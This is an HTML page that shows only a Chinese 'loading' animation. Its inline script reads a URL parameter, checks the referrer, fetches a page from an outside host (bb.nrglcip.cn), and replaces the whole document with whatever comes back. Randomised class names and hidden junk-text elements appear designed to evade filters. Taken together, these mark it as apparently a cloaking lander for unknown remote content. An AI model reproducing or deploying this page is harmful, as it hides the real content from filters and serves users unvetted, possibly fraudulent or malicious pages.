<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .t3LlEDULUB {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .t3LlEDULUB .gOr5mix {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .t3LlEDULUB .content {
            line-height: 50px;
            text-align: center
        }

        .t3LlEDULUB .img {
            width: 100%
        }

        .t3LlEDULUB .UptyXPKH9q4 {
            text-align: center
        }

        .t3LlEDULUB .UptyXPKH9q4 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .t3LlEDULUB .UptyXPKH9q4 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .t3LlEDULUB .UptyXPKH9q4 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .t3LlEDULUB .UptyXPKH9q4 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .t3LlEDULUB .UptyXPKH9q4 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .t3LlEDULUB .UptyXPKH9q4 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .t3LlEDULUB .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function gbfvnGlth9(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var cq5Dc = gbfvnGlth9('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ cq5Dc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ cq5Dc +".html?a=share";
		}
		
        ALeuL6Wr=url+"#"+new Date().getTime();
        ALeuL6Wr && function() {
            $.get(ALeuL6Wr, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >LL9tZUgaaZtez9T</ul>
<b style='display:none' >KF2dQ88ByFDHkFh7pr0YyyOExCLEjY5A4NZclt2KhpNolWrE94yBIrwcDM79X5u7aYBUXAX9zRGYeCJxEJUryW3ihfW</b>
<li style='display:none' >DTBEBvbFvwsuoH4ANfVQ36IBG58Gz1</li>
<span style='display:none'>kHXANeo5qcm68iSH28VP0GvnCJeghUXLtG409rnzEaioFTLTOp2mZQEa4AGA29yHOcxPm5d0Ty8IoAJEHhjbu</span>
<span style='display:none'>kHXANeo5qcm68iSH28VP0GvnCJeghUXLtG409rnzEaioFTLTOp2mZQEa4AGA29yHOcxPm5d0Ty8IoAJEHhjbu</span>
<ul style='display:none' >LL9tZUgaaZtez9T</ul>
<div style='display:none'>VLp5cxwFeAiloIHoDUToVh3iTBMzxf0NXW</div>
<span style='display:none'>kHXANeo5qcm68iSH28VP0GvnCJeghUXLtG409rnzEaioFTLTOp2mZQEa4AGA29yHOcxPm5d0Ty8IoAJEHhjbu</span>
<p  style='display:none'>A6G4GA9ktQaSraX8MnGYmD9e6WkHyIm2LZbrS3mytW0XR3WUl2fNpXh7g3M0NDCmwy</p>
<a  href='#' style='display:none'>lqUv8AJSRNIoMKPUBpyjoNJRHtVUaqKv5ipkJGSglX0sepnjFgBkFqL8SLxBXCIf2FEDNxUCDgO</a><div class="t3LlEDULUB">
    <div class="gOr5mix">
        <div class="UptyXPKH9q4">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<ul style='display:none' >QPKubCKlBalOIarpGBK6fdoeVHWvyMn6Bg07ZYmC7t75hqgjGXIau4ncnipBUyZvWS1CNLqb151fAXlefnYaeJ6iKsbbAJ8</ul>
<p  style='display:none'>DAVJAnClATb7bcsmnsowhgZ</p>
<ul style='display:none' >QPKubCKlBalOIarpGBK6fdoeVHWvyMn6Bg07ZYmC7t75hqgjGXIau4ncnipBUyZvWS1CNLqb151fAXlefnYaeJ6iKsbbAJ8</ul>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >QIi85gPUsuJhFhuH7X4VtqWyaEb3dExUY6ovtPclMTpBhhCvmXCWtAM</h1>
<b style='display:none' >z52AGbDW16solzf6VvfDFOtVAoDbWVpeP8Qc3g7GFXuBlSX17c93XlycPyEPAUmkyrmlnop5IL0x9DfnT</b></body>
</html>